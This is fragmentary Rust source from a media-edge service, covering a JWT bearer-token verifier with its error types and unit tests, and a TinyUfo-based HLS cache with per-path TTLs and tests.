800-53 control equivalency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Submit to FedRAMP PMO for provisional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Deliverable: "gVisor Security Equivalency Analysis" (20-30 pages)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 criteria: FedRAMP PMO accepts equivalency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B: Replace gVisor with APL-approved alternative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6-8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Alternatives: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Kata Containers (APL-approved, VM-level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AWS Firecracker (if deploying on AWS GovCloud)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Risk: Performance degradation (VM startup overhead vs. gVisor)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C: Defer FedRAMP, pursue SOC2 Type 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3 months (vs. 6-9 months for FedRAMP)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Tradeoff: Cannot sell to federal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Items:**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1: Draft gVisor equivalency white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2: Engage FedRAMP PMO for pre-consultation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3: Revise based on PMO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4: Submit to 3PAO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⚠️ AC-2: Account Management (Automated Provisioning)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**Control:** AC-2 (Account Management), AC-2(1) (Automated System Account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automated user provisioning/deprovisioning via SCIM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account creation is not FedRAMP-compliant (requires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MEDIUM - Required for FedRAMP, but common gap with known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 with Okta SCIM (or similar IdP)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Configure Okta SCIM provisioning for MCP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Automate account creation on first API call (JIT provisioning)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Automate account deletion when user removed from Okta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Log all provisioning events to BigQuery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Technology: Okta SCIM 2.0 API + Python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Items:**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1: Configure Okta SCIM connector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2: Implement JIT provisioning in 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2: Test account lifecycle (create, update,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⚠️ AU-6: Audit Review, Analysis,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**Control:** AU-6 (Audit Review), AU-6(1) (Automated Process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logs written to BigQuery, but no automated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FedRAMP requires automated review of audit logs (not just manual inspection)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MEDIUM - Required for FedRAMP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Cloud Logging + BigQuery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Export BigQuery logs to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Create alerting policies for security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Spike in security violations (&gt;10 in 1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Sandbox execution failures (&gt;5 in 1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Unauthorized API access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Unusual execution patterns (code hash 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Integrate with PagerDuty for incident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Technology: Google Cloud Logging Alerts + BigQuery scheduled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Items:**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1: Configure Cloud Logging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1: Create alerting policies (5 critical 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1: Test alert delivery (simulate security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⚠️ SC-7: Boundary Protection (mTLS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**Control:** SC-7 (Boundary Protection), SC-8 (Transmission Confidentiality)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Istio mTLS configured, but not enforced on all service-to-service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NetworkPolicy allows some unencrypted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MEDIUM - Required for FedRAMP (data in transit must be encrypted)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strict mTLS with Istio PeerAuthentication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Create PeerAuthentication resource (STRICT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Verify all service mesh traffic uses mTLS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Block unencrypted traffic via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Update monitoring to alert on non-mTLS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Kubernetes manifest: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apiVersion: security.istio.io/v1beta1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PeerAuthentication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mode: STRICT  # Enforce mTLS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Items:**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1: Deploy PeerAuthentication (STRICT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1: Verify with: istioctl authn tls-check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1: Update NetworkPolicy (block non-mTLS)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⚠️ SI-3: Malicious Code Protection (AST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**Control:** SI-3 (Malicious Code Protection), SI-3(1) (Central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AST validation exists in mcp_server.py, but no centralized signature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FedRAMP requires regularly updated malicious code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MEDIUM - Required for FedRAMP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Centralized AST Rule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Create "AST Rules" repository (Git-based)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Define rules in YAML (blocked imports, patterns,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MCP server fetches rules on startup + polls for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Log rule violations to BigQuery with rule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 rule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2024-11-07-001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'__import__'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'eval\s*\('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blocked_functions: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 Items:**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1: Create AST rules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2: Implement dynamic rule loading in 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Week 3: Test rule updates (deploy new rule, verify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CONTROL FAMILY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Detailed assessment of all 20 NIST 800-53 control families.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AC: Access Control (26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AC-1: Access Control Policy and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 Access control policy documented in system security plan (SSP)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SSP, interview security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AC-2: Account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 (after remediation of automated provisioning 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accounts managed via Okta SCIM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managed via Kubernetes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provisioning/deprovisioning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logs of all account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Okta SCIM integration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audit logs: `SELECT * FROM mcp_audit_logs.account_changes`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RBAC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Test account lifecycle (create, update,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AC-3: Access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authentication via JWT (issued by Okta)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RBAC for service-to-service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Istio AuthorizationPolicy for fine-grained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 validation code in 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RBAC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Istio AuthorizationPolicy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Attempt unauthorized API access (expect 403)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AC-6: Least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server runs as non-root user (UID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securityContext: `allowPrivilegeEscalation: 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sandbox prevents privilege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 has minimal IAM permissions (BigQuery write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Deployment securityContext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IAM policy for mcp-server@PROJECT_ID.iam.gserviceaccount.com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kernel syscall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Attempt privilege escalation from sandbox (expect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AC-17: Remote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API access over HTTPS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SSH access to pods (kubectl exec disabled via PodSecurityPolicy)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Remote access via GCP Cloud Console (MFA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Istio Gateway TLS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PodSecurityPolicy blocking kubectl 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Cloud Console MFA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Test remote access controls (MFA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AU: Audit and Accountability (16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AU-2: Audit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 executions logged to BigQuery (100%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fields: timestamp, user_id, session_id, code_hash, success, error, resource_usage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violations logged separately (security_violations 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table schema: `mcp_audit_logs.code_executions`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query: `SELECT * FROM mcp_audit_logs.code_executions WHERE success = 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Execute test code, verify log entry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AU-3: Content of Audit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logs include all required fields per NIST 800-53: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Event type (code execution, security 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Date/time (RFC3339 with timezone)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User identity (user_id from JWT)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 (success/failure)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Source (session_id, sandbox_id)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AuditLogEntry dataclass in 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BigQuery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audit log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AU-4: Audit Log Storage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dataset has unlimited storage (auto-scaling)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policy: 7 years (exceeds FedRAMP 3-year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alert if log write fails (metrics_audit_log_errors)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dataset configuration (retention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alert: `mcp_audit_log_errors_total &gt; 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Verify retention policy in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⚠️ AU-6: Audit Review, Analysis,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Gap (see Critical Gaps section for remediation)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AU-9: Protection of Audit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access restricted via IAM (read-only for auditors)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Immutable audit logs (BigQuery does not support UPDATE/DELETE)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 tampering detected via checksum (code_hash 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IAM policy (auditor group has bigquery.dataViewer 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table does not support UPDATE (only INSERT)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Attempt to modify audit log (expect permission denied)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AU-12: Audit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Application-level logging (Python logging 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System-level logging (GKE logs to Cloud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Network-level logging (Istio access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mcp_server.py logging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Logging: `resource.type="k8s_pod" AND resource.labels.namespace_name="mcp-system"`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Istio EnvoyFilter for access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Generate test traffic, verify logs at all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CA: Assessment, Authorization, and Monitoring (9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CA-1: Security Assessment and Authorization Policies and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 SSP documents assessment procedures, ATO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CA-2: Security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 (3PAO will perform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internal security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3PAO assessment for FedRAMP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monitoring via Prometheus/Grafana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security assessment reports (Q1 2024, Q2 2024,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Security Assessment Report (SAR)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Perform security assessment (penetration testing, config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CA-7: Continuous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scrapes metrics every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Grafana dashboards for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Alerting on security events (PagerDuty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ServiceMonitor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Grafana dashboard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PagerDuty integration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Verify monitoring dashboards, test alert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CM: Configuration Management (14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CM-2: Baseline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as Code (Kubernetes YAML manifests in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image baseline (Dockerfile in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baseline (ConfigMap in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changes tracked via Git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repository: ShadowTag-v2/ShadowTag-v2-fastapi-services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history: `git log --oneline architecture/`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ConfigMap: mcp-server-config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Git history, verify configuration matches deployed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CM-3: Configuration Change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Pull request approval required (branch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 tests changes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Canary deployment (10% traffic before full rollout)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procedure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branch protection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workflow: `.github/workflows/deploy.yaml`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Istio VirtualService canary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Test change control process (submit PR, verify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CM-6: Configuration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settings enforced via Kubernetes manifests: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gVisor runtime (runtimeClassName: gvisor)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Non-root user (runAsUser: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Read-only filesystem (readOnlyRootFilesystem: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Network policies (egress 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Deployment securityContext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NetworkPolicy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verification: `kubectl get pod &lt;pod-name&gt; -o jsonpath='{.spec.runtimeClassName}'`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Verify security settings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CM-7: Least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Docker image (Python slim base, no shell)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required packages installed (FastAPI, Prometheus, BigQuery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Unused Kubernetes features disabled (kubectl exec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Dockerfile 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requirements.txt (10 packages, no dev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PodSecurityPolicy blocking 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Scan Docker image for vulnerabilities (Trivy/Snyk)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IA: Identification and Authentication (12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IA-2: Identification and Authentication (Organizational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authenticate via Okta (SAML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required (Okta Verify push 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requests authenticated via JWT (signed by Okta)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Okta SAML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 validation code in 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Okta MFA policy (enforced for all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Attempt API access without JWT (expect 401)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IA-2(1): Network Access to Privileged Accounts - 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privileged access requires MFA (GCP Cloud Console)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admin access via gcloud (MFA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SSH access to nodes (GKE managed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organization policy: require MFA for privileged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node pools: managed nodes (no SSH)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Attempt privileged access without MFA (expect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IA-5: Authenticator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Passwords managed via Okta (12+ characters, complexity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 expiration: 1 hour (short-lived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 keys rotated every 90 days (GCP automatic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Okta password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 exp claim (3600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service account key rotation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password policy, test JWT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IR: Incident Response (10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IR-1: Incident Response Policy and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 Incident response plan documented in SSP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IR-2: Incident Response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security training for all engineers (via Secure Code Warrior)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response tabletop exercises (quarterly)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completion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Tabletop exercise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training records, interview incident response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IR-4: Incident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response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Detection (Prometheus alerts → PagerDuty)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Containment (kubectl rollout undo, feature flag disable)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Eradication (patch vulnerability, redeploy)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Recovery (gradual rollout, canary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Lessons learned (post-mortem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response runbook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post-mortem: "2024-10-15 Sandbox Escape Attempt"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PagerDuty escalation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Simulate security incident, test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IR-5: Incident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security event monitoring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alerting (PagerDuty)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 review (BigQuery scheduled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alert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PagerDuty incident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scheduled query: "Daily Security Violations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incident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PE: Physical and Environmental Protection (20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PE-1 through PE-20: All controls inherited from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 (GCP FedRAMP High authorization)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system runs on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Physical security provided by Google data centers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Environmental controls (fire suppression, HVAC) managed by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FedRAMP High authorization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data center certifications (ISO 27001, SOC 2 Type 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GCP FedRAMP authorization, confirm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PL: Planning (11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PL-1: System Security Plan (SSP)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 SSP document (this repository + formal SSP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PL-2: System Security Plan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SSP updated quarterly (or when major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Git-based SSP (version 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history of SSP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review meetings (calendar invites)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SSP update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RA: Risk Assessment (10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RA-1: Risk Assessment Policy and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 Risk assessment policy in SSP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RA-3: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risk assessment (NIST 800-30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risk monitoring (vulnerability scanning)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 report (2024-10-01)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Vulnerability scan reports (Trivy, weekly)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risk assessment methodology, verify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RA-5: Vulnerability Monitoring and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image scanning (Trivy, on every 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cluster scanning (Falco, real-time)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scanning (Dependabot, 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Trivy scan reports in CI/CD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Falco alerts in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Dependabot pull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vulnerability scan reports, verify remediation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SA: System and Services Acquisition (23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⚠️ SA-4: Acquisition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Gap (gVisor APL issue - see Critical Gaps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SA-9: External System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API: SOC 2 Type II certified (vendor risk assessment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GCP: FedRAMP High authorized (inherited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Okta: FedRAMP Moderate authorized (identity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SOC 2 Type II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FedRAMP High authorization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Okta FedRAMP Moderate authorization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vendor security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⚠️ SA-22: Unsupported System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Gap (gVisor APL issue - see Critical Gaps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SC: System and Communications Protection (48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SC-7: Boundary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 (after remediation of mTLS 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segmentation (Kubernetes NetworkPolicy)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Egress filtering (block internet access from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mTLS for all service-to-service communication (Istio)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NetworkPolicy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Istio PeerAuthentication (STRICT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diagram showing security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Test egress blocking (attempt internet access from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SC-8: Transmission Confidentiality and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API traffic over TLS 1.3 (Istio Gateway)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service mesh traffic over mTLS (Istio)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connections over TLS (Google Cloud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Istio Gateway TLS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mTLS verification: `istioctl authn tls-check`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client TLS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Capture network traffic (verify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SC-12: Cryptographic Key Establishment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TLS certificates managed by cert-manager (automated renewal)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KMS for encryption keys (BigQuery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 signing keys managed by Okta (automatic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cert-manager Certificate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KMS key rotation policy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Okta key rotation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key management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SC-28: Protection of Information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data encrypted at rest (Google-managed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persistent volumes encrypted (GCP default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Secrets encrypted via Kubernetes encryption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dataset encryption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encryption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EncryptionConfiguration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Verify encryption at rest for all data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SI: System and Information Integrity (23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⚠️ SI-3: Malicious Code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Gap (AST validation centralization - see Critical Gaps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SI-4: System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Application monitoring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monitoring (Falco)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aggregation (Cloud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 (BigQuery scheduled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Falco security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Logging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anomaly detection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Review monitoring dashboards, test alert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SI-7: Software, Firmware, and Information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image signatures (cosign, SLSA Level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commit signatures (GPG)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Immutable infrastructure (Kubernetes immutable ConfigMaps)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cosign signature verification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log --show-signature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ConfigMap immutability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**3PAO Validation:** Verify signature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REMEDIATION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Weeks 1-2: Critical Gaps (Parallel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1-2: Draft gVisor equivalency white paper (SA-4)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3-5: Implement Okta SCIM provisioning (AC-2)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3-5: Configure Cloud Logging alerts (AU-6)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1-2: Deploy Istio PeerAuthentication STRICT mode (SC-7)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3-5: Revise gVisor white paper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5: Submit gVisor white paper to FedRAMP PMO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Weeks 3-4: AST Validation + 3PAO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1-3: Implement centralized AST rule management (SI-3)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4-5: Test all remediated controls (internal QA)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1-2: Engage 3PAO for scoping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Day 3-5: Prepare evidence packages (logs, configs,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Weeks 5-6: 3PAO Readiness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5-6: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3PAO reviews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3PAO performs initial security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Address 3PAO findings (minor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Deliver final Statement of Work (SOW)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2-6: Formal 3PAO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2-3: Security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Penetration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and procedure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Interview security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4-5: Security Assessment Report (SAR)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writes SAR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Remediate any new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SAR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6: FedRAMP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Submit SAR to FedRAMP PMO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Agency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Authorization to Operate (ATO) granted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GO/NO-GO CRITERIA (Hour 48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 Criteria (Proceed with FedRAMP)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critical gaps have remediation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gVisor equivalency white paper accepted by FedRAMP PMO (or alternative identified)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3PAO timeline ≤6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3PAO cost ≤$250K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showstopper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PIVOT Criteria (SOC2 Instead of FedRAMP)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gVisor APL issue unresolved → SOC2 Type II (3 months, non-federal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FedRAMP timeline 6-9 months → Start with SOC2, upgrade to FedRAMP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ABORT Criteria (Security Infeasible)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gVisor showstopper with no workaround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3PAO timeline &gt;9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3PAO identifies critical vulnerability with no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EVIDENCE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evidence for 3PAO assessment must be organized in a central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policies/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access-control-policy.pdf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incident-response-plan.pdf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risk-assessment-policy.pdf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configurations/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kubernetes-manifests/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istio-policies/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gcp-iam-policies/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logs/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bigquery-audit-logs-sample.json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cloud-logging-exports/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prometheus-metrics-sample.txt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assessments/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vulnerability-scan-reports/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penetration-test-results/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internal-security-assessments/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vendor-documentation/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anthropic-soc2-report.pdf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gcp-fedramp-authorization.pdf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okta-fedramp-authorization.pdf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ssp/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system-security-plan.pdf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gvisor-equivalency-whitepaper.pdf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control-implementation-summary.xlsx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SCENARIOS FOR 3PAO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3PAO will perform security testing to validate control implementation. Prepare for these test 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Authentication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API access without JWT (expect 401)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http://mcp-server.mcp-system/execute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'{"code": "print(1+1)", "user_id": "test", "session_id": "test"}'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401 Unauthorized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API access with expired JWT (expect 401)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http://mcp-server.mcp-system/execute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&lt;expired-jwt&gt;"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'{"code": "print(1+1)", "user_id": "test", "session_id": "test"}'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401 Unauthorized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API access with valid JWT (expect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http://mcp-server.mcp-system/execute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&lt;valid-jwt&gt;"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'{"code": "result = 1+1", "user_id": "test", "session_id": "test"}'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200 OK, result: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Sandbox Escape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Access /proc filesystem (expect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code='import os; os.listdir("/proc")'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Network exfiltration (expect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code='import urllib.request; urllib.request.urlopen("https://attacker.com")'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Subprocess execution (expect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code='import subprocess; subprocess.run(["whoami"])'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File write (expect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code='open("/tmp/evil.txt", "w").write("hacked")'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should return 403 Forbidden with security violation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Audit Log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Test: Verify all executions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COUNT(*) FROM `PROJECT_ID.mcp_audit_logs.code_executions`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timestamp &gt;= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 1 HOUR);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Expected: Count matches number of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Test: Verify security violations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* FROM `PROJECT_ID.mcp_audit_logs.code_executions`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ARRAY_LENGTH(security_violations)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 BY timestamp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Expected: All blocked executions appear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Encryption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Capture network traffic (expect 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istio-system &lt;istio-ingress-pod&gt;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tcpdump -i any -c 100 -w /tmp/traffic.pcap port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Verify mTLS between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istioctl authn tls-check mcp-server.mcp-system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Verify BigQuery connection uses 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(Review BigQuery client logs for SSL/TLS handshake)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Resource Limit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CPU exhaustion (expect cgroup limit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code='while True: pass'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Memory exhaustion (expect OOM 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code='x = [i for i in range(10**9)]'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Test: Disk exhaustion (expect quota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code='open("/tmp/big.txt", "w").write("x" * 10**9)'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should terminate within timeout, not crash the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**FedRAMP authorization is achievable within 6 months**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gVisor equivalency white paper accepted by FedRAMP PMO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All critical gaps remediated (5-9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3PAO cost ≤$250K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No showstopper findings during readiness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1-4: Remediate critical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5-6: 3PAO readiness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2-6: Formal 3PAO assessment + FedRAMP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**Fallback Path (if gVisor issue unresolved):**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Pivot to SOC2 Type II (3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 non-federal customers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Pursue FedRAMP later with APL-approved alternative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decision at Hour 48 will determine which path to take.**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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/security/SECURITY_AUDIT_CHECKLIST.md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apps/aiyou_stack/aiyou-fastapi-services/mcp/perplexity/__init__.py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"""Perplexity MCP Server - Governance Bridge for Comet Browser &amp; AI Shopping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compliance scoring for transaction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 for AI-generated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Apertus manifest logging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mcp.perplexity.server import PerplexityMCPServer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mcp.perplexity.tools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log_to_manifest,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"PerplexityMCPServer",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"log_to_manifest",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"watermark_content",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apps/aiyou_stack/aiyou-fastapi-services/mcp/perplexity/__init__.py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apps/aiyou_stack/aiyou-fastapi-services/mcp/perplexity/server.py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"""Perplexity MCP Server - Model Context Protocol Server for Perplexity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Comet browser queries through Judge 6 for compliance scoring,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stamps SHADOWTAG watermarks on AI-generated content, and logs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transactions to Apertus-compatible manifest for "Total Recall" audit.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latency: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 overhead: &lt;5ms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 write: &lt;2ms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Judge 6 governance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  # APPROVE, DENY,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compliance_flags: dict[str, bool]  # GDPR, CCPA, PCI-DSS,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SHADOWTAG watermarking."""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merkle_root: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ManifestEntry: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"""Apertus-compatible manifest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watermark_sig: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safety_scores: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PerplexityMCPServer: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 Server for Perplexity Comet Browser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three core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governance_score - Judge 6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watermark_content - SHADOWTAG DCT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log_to_manifest - Apertus JSONL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 = PerplexityMCPServer()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a shopping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server.governance_score(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request_type="purchase",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content="Buy iPhone 15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user_context={"region": "EU", "payment": "PayPal"}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Watermark AI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 = await server.watermark_content(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content="Based on reviews, the iPhone 15 Pro...",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source="perplexity_comet"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to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server.log_to_manifest(result, watermarked)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judge6_latency_target_ms: int =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enable_shadowtag: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self.manifest_path = Path(manifest_path or "./logs/pnkln/perplexity/manifest.jsonl")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self.manifest_path.parent.mkdir(parents=True,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self.judge6_latency_target = judge6_latency_target_ms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self.enable_shadowtag = enable_shadowtag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self.governance_latencies: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self.watermark_latencies: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domain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self.compliance_domains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"GDPR":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["eu", "europe", "gdpr", "consent", "pii", "delete"],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"weight":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"CCPA": {"keywords": ["california", "ccpa", "opt-out", "sell"], "weight": 1.2},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"PCI_DSS":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["payment", "card", "credit", "checkout", "paypal", "shopify"],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"weight":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"COPPA": {"keywords": ["child", "minor", "kids", "under13"], "weight": 2.5},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"HIPAA": {"keywords": ["health", "medical", "patient", "hipaa"], "weight": 2.0},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print("Perplexity MCP Server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Manifest: {self.manifest_path}")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Judge 6 target: &lt;{judge6_latency_target_ms}ms")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SHADOWTAG: {'enabled' if enable_shadowtag else 'disabled'}")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governance_score(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"""Judge 6 governance scoring for Perplexity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Evaluates compliance requirements and risk level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Shopping transactions (Comet checkout)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Content generation (AI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 access (user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request_type: Type of request (purchase, query, generate)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Request content/query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user_context: User context (region, payment method,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transaction_value: Optional transaction amount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GovernanceResult with decision, risk score,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hashlib.sha256(f"{content}{time.time()}".encode()).hexdigest()[:16]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 = self._check_compliance_domains(content, user_context)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self._calculate_risk_score(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"Low risk - auto-approved"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&lt;=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"Medium risk - approved with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&lt;=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"High risk - requires human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"Critical risk - auto-denied"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compliance-specific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active_compliance = [k for k, v in compliance_flags.items() if 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+= f" | Compliance: {', '.join(active_compliance)}"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self.governance_latencies.append(latency_ms)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SLA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latency_ms &gt; self.judge6_latency_target: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SLA BREACH: Judge 6 took {latency_ms:.1f}ms (target: {self.judge6_latency_target}ms)",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GovernanceResult(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compliance_flags=compliance_flags,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_check_compliance_domains(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which compliance domains apply."""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combined_text = f"{content} {json.dumps(user_context)}".lower()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domain, config in self.compliance_domains.items():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flags[domain] = any(kw in combined_text for kw in config["keywords"])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dict[str, bool],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score (0-100)."""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base_risk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Request type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type_risks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"purchase":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"checkout":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base_risk += type_risks.get(request_type.lower(),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Transaction value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transaction_value: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transaction_value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transaction_value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domain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domain, active in compliance_flags.items():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self.compliance_domains[domain]["weight"]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int(10 *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 length penalty (longer = more risk surface)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len(content)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base_risk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min(base_risk,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watermark_content(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WatermarkResult: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SHADOWTAG watermark to AI-generated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cryptographic signature and Merkle root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Source identifier (e.g., "perplexity_comet")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WatermarkResult with signature and merkle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datetime.utcnow().isoformat() + "Z"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**(metadata or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message for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full_metadata,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signature (simplified - in production use ed25519)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f"shadowtag:{hashlib.sha256(message.encode()).hexdigest()}"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Merkle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merkle_root = f"sha256:{hashlib.sha256(f'{content}{timestamp}'.encode()).hexdigest()}"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self.watermark_latencies.append(latency_ms)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merkle_root=merkle_root,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metadata=full_metadata,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log_to_manifest(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governance_result: GovernanceResult,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watermark_result: WatermarkResult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context_id: str = "perplexity_comet",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transaction to Apertus-compatible JSONL manifest.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entry for future Elasticsearch indexing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Full-text searchable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Faceted filtering by context_id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Compliance flag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governance_result: Result from governance_score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watermark_result: Optional watermark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context_id: Context identifier for faceting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 ID for the logged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governance_result.request_id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datetime.utcnow().isoformat() + "Z"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ManifestEntry(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run_id=run_id,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context_id=context_id,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content=watermark_result.content if watermark_result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decision=governance_result.decision,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risk_score=governance_result.risk_score,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watermark_sig=watermark_result.signature if watermark_result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safety_scores={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"compliance_flags": governance_result.compliance_flags,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"risk_score": governance_result.risk_score,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governance_result.decision,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governance_result.latency_ms,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"reasoning": governance_result.reasoning,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"merkle_root": watermark_result.merkle_root if watermark_result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"perplexity_mcp",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to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open(self.manifest_path,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f.write(json.dumps(asdict(entry))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server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"total_governance_calls": len(self.governance_latencies),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"avg_governance_latency_ms":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sum(self.governance_latencies) / len(self.governance_latencies)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self.governance_latencies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"p99_governance_latency_ms":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sorted(self.governance_latencies)[int(len(self.governance_latencies) * 0.99)]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len(self.governance_latencies) &gt;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max(self.governance_latencies,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"total_watermarks": len(self.watermark_latencies),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"manifest_path": str(self.manifest_path),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Tool Definitions for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PERPLEXITY_MCP_TOOLS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"perplexity_governance_score",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"Score a Perplexity Comet browser request for compliance using Judge 6. Returns risk score and decision (APPROVE/DENY/REVIEW).",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"Type of request: purchase, checkout, query, generate, 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{"type": "string", "description": "The request content or query"},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{"type": "string", "description": "User's region (e.g., EU, US-CA)"},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"transaction_value":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"Transaction value in USD (optional)",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["request_type", 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"perplexity_watermark",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"Apply SHADOWTAG cryptographic watermark to AI-generated content for provenance tracking.",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{"type": "string", "description": "Content to watermark"},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"Source identifier (e.g., perplexity_comet, perplexity_shopping)",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["content", "source"],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"perplexity_audit_search",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"Search the Apertus manifest for past governance decisions. For 'Total Recall' audit queries.",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"Search query (e.g., 'GDPR decisions', 'denied transactions')",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"context_id": {"type": "string", "description": "Filter by context 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"Filter by decision: APPROVE, DENY,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test_perplexity_mcp():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Perplexity MCP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Perplexity MCP Server Test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PerplexityMCPServer()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Governance scoring for EU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 1: EU Shopping Transaction")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server.governance_score(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request_type="purchase",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content="Buy iPhone 15 Pro Max 256GB",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user_context={"region": "EU", "payment": "PayPal"},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transaction_value=1199.00,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Decision: {result.decision}")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 Score: {result.risk_score}")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Compliance: {result.compliance_flags}")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Latency: {result.latency_ms:.2f}ms")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Reasoning: {result.reasoning}")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Watermark AI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2: SHADOWTAG Watermarking")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 = await server.watermark_content(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content="Based on user reviews and specifications, the iPhone 15 Pro Max offers excellent camera performance...",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source="perplexity_comet",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metadata={"query": "best phone 2024", "model": "gemini-3.1-flash-lite-preview"},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Signature: {watermark.signature[:50]}...")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Merkle Root: {watermark.merkle_root[:50]}...")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Log to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3: Apertus Manifest Logging")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run_id = await server.log_to_manifest(result, watermark)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Logged run_id: {run_id}")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4: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4: Server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server.get_stats()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asyncio.run(test_perplexity_mcp())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apps/aiyou_stack/aiyou-fastapi-services/mcp/perplexity/server.py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apps/aiyou_stack/aiyou-fastapi-services/mcp/perplexity/tools.py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"""Perplexity MCP Tools - Standalone tool functions for MCP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functions can be registered directly with Claude Code's MCP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called programmatically from other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manifest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MANIFEST_PATH = Path("./logs/pnkln/perplexity/manifest.jsonl")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governance_score(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user_region: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governance scoring for Perplexity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Type of request (purchase, checkout, query, generate)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Request content/query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user_region: User's region (EU, US-CA,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transaction_value: Transaction value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decision, risk_score, compliance_flags,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 = hashlib.sha256(f"{content}{time.time()}".encode()).hexdigest()[:16]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user_context = {"region": user_region} if user_region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domain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"GDPR": ["eu", "europe", "gdpr", "consent", "pii", "delete"],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"CCPA": ["california", "ccpa", "opt-out", "sell"],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"PCI_DSS": ["payment", "card", "credit", "checkout", "paypal", "shopify"],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"COPPA": ["child", "minor", "kids", "under13"],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["health", "medical", "patient", "hipaa"],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combined_text = f"{content} {json.dumps(user_context)}".lower()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compliance_flags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any(kw in combined_text for kw in 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domain, keywords in compliance_domains.items()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base_risk = {"purchase": 30, "checkout": 40, "query": 10, "generate": 15, "delete": 50}.get(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transaction_value and transaction_value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base_risk +=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transaction_value and transaction_value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base_risk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domain, active in compliance_flags.items():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 = {"GDPR": 1.5, "CCPA": 1.2, "PCI_DSS": 2.0, "COPPA": 2.5, "HIPAA": 2.0}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base_risk += int(10 * weights.get(domain, 1.0))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 = min(base_risk,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risk_score &lt;=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reasoning = "APPROVE", "Low risk - auto-approved"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risk_score &lt;=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reasoning = "APPROVE", "Medium risk - approved with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risk_score &lt;=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reasoning = "REVIEW", "High risk - requires human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reasoning = "DENY", "Critical risk - auto-denied"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active_compliance = [k for k, v in compliance_flags.items() if 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active_compliance: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+= f" | Compliance: {', '.join(active_compliance)}"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"risk_score":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"compliance_flags": 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round(latency_ms,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watermark_content(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SHADOWTAG cryptographic watermark to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Content to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Source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signature, merkle_root,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datetime.now(UTC).isoformat().replace("+00:00", "Z")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full_metadata = {"source": source, "timestamp": timestamp, **(metadata or {})}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json.dumps({"content": content, "metadata": full_metadata},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f"shadowtag:{hashlib.sha256(message.encode()).hexdigest()}"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merkle_root = f"sha256:{hashlib.sha256(f'{content}{timestamp}'.encode()).hexdigest()}"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"signature":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"merkle_root": merkle_root,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full_metadata,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log_to_manifest(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watermark_result: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context_id: str = "perplexity_comet",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transaction to Apertus-compatible JSONL manifest.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governance_result: Result from governance_score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watermark_result: Optional watermark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context_id: Context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ID for the logged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run_id = governance_result.get(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hashlib.sha256(str(datetime.now()).encode()).hexdigest()[:16],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datetime.now(UTC).isoformat().replace("+00:00", "Z")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"run_id": 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"context_id": context_id,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watermark_result.get("content", "") if watermark_result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"decision": governance_result.get("decision",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"risk_score": governance_result.get("risk_score",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"watermark_sig": watermark_result.get("signature", "") if watermark_result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"safety_scores":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"compliance_flags": governance_result.get("compliance_flags",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governance_result.get("risk_score",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governance_result.get("decision",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governance_result.get("latency_ms",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governance_result.get("reasoning",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"merkle_root": watermark_result.get("merkle_root", "") if watermark_result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"perplexity_mcp",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open(MANIFEST_PATH,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f.write(json.dumps(entry)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search_manifest(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the Apertus manifest for past governance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Search query (searches content and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context_id: Filter by context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Filter by decision (APPROVE, DENY,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matching manifest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MANIFEST_PATH.exists():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open(MANIFEST_PATH)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 = json.loads(line.strip())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context_id and entry.get("context_id") != context_id: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decision and entry.get("decision") != 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Search in content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entry.get("content",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 = entry.get("meta", {}).get("reasoning",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query_lower in content or query_lower in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len(results)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Tool Registration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get_mcp_tools()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MCP tool definitions for registration."""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"perplexity_governance_score",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"Score a Perplexity request for compliance using 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governance_score,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"perplexity_watermark",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"Apply SHADOWTAG watermark to AI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watermark_content,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"perplexity_log",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"Log transaction to Apertus manifest",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log_to_manifest,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"perplexity_search",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"Search past governance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search_manifest,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Perplexity MCP Tools\n")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governance_score(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request_type="purchase",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content="Buy MacBook Pro M3",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user_region="EU",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transaction_value=2499.00,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print(f"Governance: {result['decision']} (risk: {result['risk_score']})")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 = watermark_content(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content="The MacBook Pro M3 offers excellent performance...",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source="perplexity_comet",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print(f"Watermark: {wm['signature'][:40]}...")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run_id = log_to_manifest(result, wm)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print(f"Logged: {run_id}")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search_manifest("MacBook")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print(f"Search results: {len(results)}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apps/aiyou_stack/aiyou-fastapi-services/mcp/perplexity/tools.py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apps/aiyou_stack/aiyou-fastapi-services/media-edge/k8s/backendconfig.yaml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cloud.google.com/v1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BackendConfig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media-edge-backend-config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Health check for GCP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Connection draining for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No session affinity (stateless)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affinityType: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Request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Cloud CDN configuration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includeHost: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includeProtocol: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includeQueryString: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cacheMode: CACHE_ALL_STATIC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defaultTtl: 3600      # 1 hour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maxTtl: 86400         # 24 hours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clientTtl: 3600       # 1 hour client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negativeCaching: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signedUrlCacheMaxAgeSec: 7200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 policy (optional, uncomment if using Cloud Armor)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  name: "pnkln-security-policy"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apps/aiyou_stack/aiyou-fastapi-services/media-edge/k8s/backendconfig.yaml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GCS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GCS_BUCKET: "cineverse-media-prod"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GCS_PREFIX: "hls/"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Cache configuration (MVP: 512MB)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CACHE_SIZE_MB: "512"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CACHE_TTL_SECONDS: "3600"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Server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LISTEN_ADDR: "0.0.0.0:8080"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METRICS_ADDR: "0.0.0.0:9090"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Use Spot VMs (matches existing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key: cloud.google.com/gke-spot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operator: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Security context (non-root)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seccompProfile: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RuntimeDefault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us-central1-docker.pkg.dev/PROJECT_ID/pnkln/media-edge:latest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EDGE_LISTEN_ADDR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"0.0.0.0:8080"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EDGE_METRICS_ADDR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"0.0.0.0:9090"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EDGE_GCS_PREFIX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GCS_PREFIX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EDGE_CACHE_SIZE_MB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CACHE_SIZE_MB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EDGE_CACHE_TTL_SECONDS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CACHE_TTL_SECONDS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EDGE_JWT_SECRET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jwt-secret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EDGE_JWT_ALGORITHM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EDGE_POP_ID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fieldPath: spec.nodeName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RUST_LOG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"info,media_edge=debug"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Liveness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Startup probe for slow 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startupProbe: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sizeLimit: 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apps/aiyou_stack/aiyou-fastapi-services/media-edge/k8s/hpa.yaml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CPU-based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Memory-based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Scale down slowly to avoid thrashing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Scale up quickly to handle traffic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apps/aiyou_stack/aiyou-fastapi-services/media-edge/k8s/hpa.yaml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Enable Network Endpoint Groups for GCP LB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Link to backend config for Cloud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"media-edge-backend-config"}'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apps/aiyou_stack/aiyou-fastapi-services/media-edge/src/auth.rs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JWT authentication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Matches the JWT structure from the Python backend (src/aiyou/auth.py)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jsonwebtoken::{decode, Algorithm, DecodingKey, Validation};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serde::{Deserialize, Serialize};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JWT claims structure (matches Python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Serialize, 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Claims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User ID (subject)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sub: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Expiration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exp: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Token ID (JWT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jti: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Token type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"type",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token_type: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Issued at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iat: Option&lt;usize&gt;,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JWT verification error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AuthError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TokenExpired,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ValidationFailed(String),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std::fmt::Display for AuthError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fmt(&amp;self, f: &amp;mut std::fmt::Formatter&lt;'_&gt;) -&gt; 